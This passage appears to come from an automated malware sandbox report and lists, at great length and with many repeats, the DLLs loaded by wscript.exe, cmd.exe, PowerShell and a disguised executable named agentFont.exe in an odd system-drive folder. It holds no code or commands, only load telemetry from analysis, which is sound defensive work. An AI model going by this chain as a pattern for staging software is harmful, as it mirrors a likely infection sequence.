                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: version.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: slc.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: mscoree.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: kernel.appcore.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: version.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: uxtheme.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: windows.storage.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: wldp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: profapi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: cryptsp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: rsaenh.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: cryptbase.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: sspicli.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: mscoree.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: kernel.appcore.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: version.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ucrtbase_clr0400.dll
